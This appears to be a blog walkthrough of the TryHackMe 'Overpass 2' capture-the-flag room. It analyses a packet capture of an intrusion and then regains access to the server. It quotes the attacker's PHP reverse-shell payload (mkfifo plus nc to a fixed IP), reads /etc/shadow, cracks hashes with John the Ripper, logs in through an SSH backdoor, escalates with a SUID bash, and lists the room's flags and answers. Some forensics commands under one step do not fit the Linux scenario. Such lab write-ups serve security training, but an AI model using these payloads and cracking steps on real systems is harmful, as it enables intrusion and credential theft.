Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.
Can you work out how the attacker got in, and hack your way back into Overpass' production server?
Information
Room: Overpass 2
Difficulty: Easy
Files : overpass2.pcapng 3.7MB
Environment: Remnux Virtual Machine
My Recommendations
This is my personal preference, I like being organized and deleting a folder when I’m done with it .
mkdir Documents/TryHackMe/Overpass && cd Documents/TryHackMe/Overpass
Download it from the room, and then verify the file hash:
md5sum overpass2.pcapng
MD5 hash: 11c3b2e9221865580295bc662c35c6dc
Walkthrough
Task 1: Forensics - Analyse the PCAP
1. What was the URL of the page they used to upload a reverse shell?
Opening the file in Wireshark and filtering the packets with ‘http‘:
A file named ‘upload.php’ was uploaded to /development/. We can check if it’s a reverse shell by selecting: File->Export Objects->HTTP and save the file to our VM. Then, to print its contents:
cat upload.php
It’s indeed a php reverse shell!
Answer: /development/
2. What payload did the attacker use to gain access?
The payload used is the one in the file upload.php.
Answer: <?php exec(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f”)?>
3. What password did the attacker use to privesc?
The easy, lazy way is to use strings on the pcapng file and grep for password:
strings overpass2.pcapng | grep pass -A 5
There are many matches, but ultimately the password whenevernoteartinstant was used for privilege escalation.
In the PCAP, we can look into the tcp streams. TCP stream 1 contains the packets relevant to the initial attack -ie when the reverse shell was uploaded. TCP stream 2 contains the packets in relations to the reverse shell being ‘activated‘. TCP stream 3 is very juicy. It contains the packets of the attacker’s commands:
vol.py -f victim.raw --profile=Win7SP1x64 dumpregistry -o 0xfffff8a00104e010 --dump-dir=.
rip.pl -p shellbags_tln -r registry.0xfffff8a00104e010.UsrClassdat.reg | sort -k1 -n -t,
After entering this password, the attacker was logged in as james.
Answer: whenevernoteartinstant
4. How did the attacker establish persistence?
In the same TCP stream (stream 3), the attacker downloaded the github repository ‘ssh-backdoor’:
Then, the attacker generated a ssh-key:
and executed the backdoor with a hash:
5. Using the fasttrack wordlist, how many of the system passwords were crackable?
Before downloading ssh-backdoor, the smarty attacker printed the contents of the /etc/shadow file. The file contains the hashed passwords of the users. Only five users have hashes:
We can save the hashes in a text file and crack them with John The Ripper:
echo -n '#hashes' > hashes
john --wordlist=fasttrack.txt hashes
John managed to crack four out five hashes with the fasttrack wordlist:
Answer: 4
Task 2: Research - Analyse the code
1.What's the default hash for the backdoor?
For this challenge, I installed and built ssh-backdoor. After building it, we can check the value with the help option:
./backdoor -h
Answer: bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3
2. What's the hardcoded salt for the backdoor?
Looking at ‘main.go’ of the ssh-backdoor repository:
cat main.go
The last function, func passwordHandler, verifies the password:
Answer: 1c362db832f3f864c8c2fe05f2002a05
3. What was the hash that the attacker used?
In the TCP stream, it was shown that the attacker used the following command:
./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
Answer: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
4. Crack the hash using rockyou and a cracking tool of your choice. What's the password?
First, saving the hash$salt to a file. The length of the hash is 128 characters, which is the standard for sha512.To crack it, we need to use the format ‘dynamic=sha512($p.$s)‘. This method only works with John the Ripper Jumbo.
echo -n '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed$1c362db832f3f864c8c2fe05f2002a05' > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
Answer: november16
Task 3: Attack - Get back in!
1. The attacker defaced the website. What message did they leave as a heading?
Filtering the pcap in Wireshark with http:
Packet 1-27 are part of the initial exploit. Packet 3562-3619 seem very suspicious. We can dump the files using File-> Export Objects -> HTTP and save both cooctus.png and index.html.
html2text index.html
Answer: H4ck3d by CooctusClan
2. Using the information you've found previously, hack your way back in!
Since we have cracked the passwords, we can ssh directly into the machine:
ssh 10.10.218.108 -p 2222
#password: november16
ls -la
We are logged in as James!
3. What's the user flag?
In James’ home directory there is a file named ‘user.txt’
ls -la ../
cat user.txt
Answer: thm{d119b4fa8c497ddb0525f7ad200e6567}
4. What's the root flag?
Still in Jame’s directory, there is a .suid_bash file, which means it gives root permissions to James. We can enter the shell and get the file:
./.suid_bash -p
cat /root/root.txt
Answer: thm{d53b2684f169360bb9606c333873144d}
TLDR
– This is a good Blue-Read team convo challenge.
– Wireshark & john for analysis and credential recovery.
– Look into source code to understand the mechanics of the attack .
– Use SSH with credentials found in pcap to find flags.
Recent Posts
Follow Us
Featured Video
Guide
Twitter
Reddit
Facebook
RELATED POSTS
